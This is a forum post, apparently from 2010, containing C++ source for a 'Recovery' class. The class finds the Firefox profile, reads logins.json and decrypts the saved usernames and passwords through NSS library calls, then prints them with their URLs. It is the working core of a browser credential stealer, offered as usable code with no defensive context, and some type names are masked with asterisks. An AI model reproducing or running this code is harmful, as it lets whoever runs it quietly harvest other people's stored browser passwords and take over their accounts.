- 21 Kas 2010
- 35
- 0
Kod:
#include "Recovery.h"
#pragma region Functions
typedef enum {
siBuffer = 0,
siClearDataBuffer = 1,
siCipherDataBuffer = 2,
siDERCertBuffer = 3,
siEncodedCertBuffer = 4,
siDERNameBuffer = 5,
siEncodedNameBuffer = 6,
siAsciiNameString = 7,
siAsciiString = 8,
siDEROID = 9,
siUnsignedInteger = 10,
siUTCTime = 11,
siGeneralizedTime = 12,
siVisibleString = 13,
siUTF8String = 14,
siBMPString = 15
} SECItemType;
typedef struct SECItemStr SECItem;
struct SECItemStr {
SECItemType type;
unsigned char *data;
unsigned int len;
};
typedef enum _SECStatus {
SECWouldBlock = -2,
SECFailure = -1,
SECSuccess = 0
} SECStatus;
typedef int PRBool;
typedef unsigned int PRUint32;
typedef **** PK11SlotInfo; /* self defined */
//Decrypt-Fkt.:
typedef SECStatus (__cdecl *NSS_InitFunc)(const char *configdir);
typedef SECStatus (__cdecl *NSS_ShutdownFunc)(****);
typedef PK11SlotInfo *(__cdecl *PK11_GetInternalKeySlotFunc)(****);
typedef **** (__cdecl *PK11_FreeSlotFunc)(PK11SlotInfo *slot);
typedef SECStatus (__cdecl *PK11_AuthenticateFunc)(PK11SlotInfo *slot, PRBool loadCerts, **** *wincx);
typedef SECStatus (__cdecl *PK11SDR_DecryptFunc)(SECItem *data, SECItem *result, **** *cx);
typedef SECStatus (__cdecl *PK11_CheckUserPasswordFunc)(PK11SlotInfo *slot, const char *pw);
typedef char *(__cdecl *PL_Base64DecodeFunc)(const char *src, PRUint32 srclen, char *dest);
typedef **** (__cdecl *SECITEM_ZfreeItemFunc)(SECItem *zap, PRBool freeit);
typedef **** (*SECITEM_AllocItem)(SECItem & item, int len);
NSS_InitFunc NSSInit = NULL;
NSS_ShutdownFunc NSSShutdown = NULL;
PK11_GetInternalKeySlotFunc PK11GetInternalKeySlot = NULL;
PK11_CheckUserPasswordFunc PK11CheckUserPassword = NULL;
PK11_FreeSlotFunc PK11FreeSlot = NULL;
PK11_AuthenticateFunc PK11Authenticate = NULL;
PL_Base64DecodeFunc PL_Base64Decode = NULL;
PK11SDR_DecryptFunc PK11SDRDecrypt = NULL;
SECITEM_ZfreeItemFunc SECITEM_ZfreeItem = NULL;
//SQLITE Fkt.
//============================================================================================
#define SQLITE_OK 0
#define SQLITE_ROW 100
typedef struct sqlite3 sqlite3;
typedef struct sqlite3_stmt sqlite3_stmt;
typedef int (_cdecl *sqlite3_open)
(
const char *filename, /* Database filename (UTF-8) */
sqlite3 **ppDb /* OUT: SQLite db handle */
);
typedef int (_cdecl *sqlite3_prepare_v2)
(
sqlite3 *db, /* Database handle */
const char *zSql, /* SQL statement, UTF-8 encoded */
int nByte, /* Maximum length of zSql in bytes. */
sqlite3_stmt **ppStmt, /* OUT: Statement handle */
const char **pzTail /* OUT: Pointer to unused portion of zSql */
);
typedef int (_cdecl *sqlite3_close)(sqlite3 *);
typedef int (_cdecl *sqlite3_step)(sqlite3_stmt *);
typedef const unsigned char * (_cdecl *sqlite3_column_text)(sqlite3_stmt *, int iCol);
//============================================================================================
#pragma end region
string Recovery::getFirefoxDatabase()
{
string sDatabase = getenv("appdata");
sDatabase += "\\Mozilla\\Firefox\\";
string sProfilesINI = sDatabase + "profiles.ini";
if(doesFileExist(sProfilesINI))
{
char cValueOfINI[MAX_PATH] = "";
DWORD dwValueSize = MAX_PATH;
if(GetPrivateProfileString("Profile0", "Path", 0, cValueOfINI, dwValueSize, sProfilesINI.c_str()) > 0)
{
string sTempProfile = cValueOfINI;
sTempProfile = sTempProfile.substr(9);
sDatabase += "Profiles\\" + sTempProfile + "\\logins.json";
if(doesFileExist(sDatabase))
{
return sDatabase;
}
else
{
return "";
}
}
else
{
return "";
}
}
else
{
return "";
}
}
string Recovery::decryptFirefox(string sEncryptedString, string sFirefoxDatabase)
{
NSSInit = (NSS_InitFunc) GetProcAddress(this->hmNSS3, "NSS_Init");
NSSShutdown = (NSS_ShutdownFunc) GetProcAddress(this->hmNSS3, "NSS_Shutdown");
PK11GetInternalKeySlot = (PK11_GetInternalKeySlotFunc) GetProcAddress(this->hmNSS3, "PK11_GetInternalKeySlot");
PK11FreeSlot = (PK11_FreeSlotFunc) GetProcAddress(this->hmNSS3, "PK11_FreeSlot");
PK11Authenticate = (PK11_AuthenticateFunc) GetProcAddress(this->hmNSS3, "PK11_Authenticate");
PK11SDRDecrypt = (PK11SDR_DecryptFunc) GetProcAddress(this->hmNSS3, "PK11SDR_Decrypt");
PL_Base64Decode = (PL_Base64DecodeFunc) GetProcAddress(this->hmNSS3, "PL_Base64Decode");
PK11CheckUserPassword = (PK11_CheckUserPasswordFunc) GetProcAddress(this->hmNSS3, "PK11_CheckUserPassword");
SECITEM_ZfreeItem = (SECITEM_ZfreeItemFunc) GetProcAddress(this->hmNSS3, "SECITEM_ZfreeItem");
string sDecryptedString = "";
if (NSSInit && NSSShutdown && PK11GetInternalKeySlot && PK11FreeSlot && PK11Authenticate && PK11SDRDecrypt && PL_Base64Decode && PK11CheckUserPassword && SECITEM_ZfreeItem)
{
sFirefoxDatabase = sFirefoxDatabase.substr(0, sFirefoxDatabase.size() - 11);
SECStatus init_status = NSSInit(sFirefoxDatabase.c_str());
if(init_status == SECSuccess)
{
int iStringLength = sEncryptedString.size();
int iDestLen = 2048;
unsigned char cDecoded[2048];
PK11SlotInfo * objPK11Slot = PK11GetInternalKeySlot();
if(PL_Base64Decode(sEncryptedString.c_str(), iStringLength, (char*) cDecoded))
{
if(objPK11Slot)
{
if (PK11Authenticate(objPK11Slot, TRUE, NULL) == SECSuccess)
{
SECItem secInput, secOutput;
secInput.data = cDecoded;
secInput.len = decoded_size(sEncryptedString.c_str());
secOutput.data = NULL;
secOutput.len = 0;
if (PK11SDRDecrypt(&secInput, &secOutput, NULL) == SECSuccess)
{
sDecryptedString = string((char*) secOutput.data, secOutput.len);
SECITEM_ZfreeItem(&secOutput, FALSE);
}
}
PK11FreeSlot(objPK11Slot);
}
}
}
}
return sDecryptedString;
}
bool Recovery::loadFirefoxLibraries()
{
string sLibrary_NSS3 = this->sFirefoxPath + "nss3.dll";
string sLibrary_Mozglue = this->sFirefoxPath + "mozglue.dll";
if(doesFileExist(sLibrary_NSS3) && doesFileExist(sLibrary_Mozglue))
{
this->hmMozglue = LoadLibrary(sLibrary_Mozglue.c_str());
this->hmNSS3 = LoadLibrary(sLibrary_NSS3.c_str());
if(this->hmNSS3 && this->hmMozglue)
{
return true;
}
else
{
return false;
}
}
else
{
return false;
}
}
bool Recovery::unloadFirefoxLibraries()
{
return FreeLibrary(this->hmNSS3) && FreeLibrary(this->hmMozglue);
}
**** Recovery::Firefox()
{
if(isBrowserInstalled(FIREFOX))
{
string sFirefoxDatabase = getFirefoxDatabase();
if(sFirefoxDatabase.size() > 0 && this->sFirefoxPath.size() > 0)
{
string sTempline = "";
ifstream ifJsonPasswords(sFirefoxDatabase.c_str(), ios::in);
if(ifJsonPasswords.is_open())
{
if(getline(ifJsonPasswords, sTempline))
{
for (int i = 0; i < sTempline.size(); i++)
{
string sURL = "";
string sEncryptedUser = "";
string sEncryptedPass = "";
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////START PARSING JSON
int iFind = sTempline.find("hostname"); // URL
if (iFind > -1)
{
sTempline = sTempline.substr(iFind, sTempline.size());
sURL = sTempline.substr(11);
iFind = sURL.find("\"");
sURL = sURL.substr(0, iFind);
sTempline = sTempline.substr(sURL.size(), sTempline.size());
}
iFind = sTempline.find("encryptedUsername"); //USER
if (iFind > -1)
{
sTempline = sTempline.substr(iFind, sTempline.size());
sEncryptedUser = sTempline.substr(20);
iFind = sEncryptedUser.find("\"");
sEncryptedUser = sEncryptedUser.substr(0, iFind);
sTempline = sTempline.substr(sEncryptedUser.size(), sTempline.size());
}
iFind = sTempline.find("encryptedPassword"); //PASS
if (iFind > -1)
{
sTempline = sTempline.substr(iFind, sTempline.size());
sEncryptedPass = sTempline.substr(20);
iFind = sEncryptedPass.find("\"");
sEncryptedPass = sEncryptedPass.substr(0, iFind);
sTempline = sTempline.substr(sEncryptedPass.size(), sTempline.size());
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////END PARSING JSON
if (sURL.size() > 0 && sEncryptedUser.size() > 0 && sEncryptedPass.size() > 0)
{
if(loadFirefoxLibraries())
{
string sUserPlain = decryptFirefox(sEncryptedUser, sFirefoxDatabase);
string sPassPlain = decryptFirefox(sEncryptedPass, sFirefoxDatabase);
cout << "URL: " << sURL << endl;
cout << "User: " << sUserPlain << endl;
cout << "Pass: " << sPassPlain << endl;
}
}
}
}
unloadFirefoxLibraries();
}
}
}
}
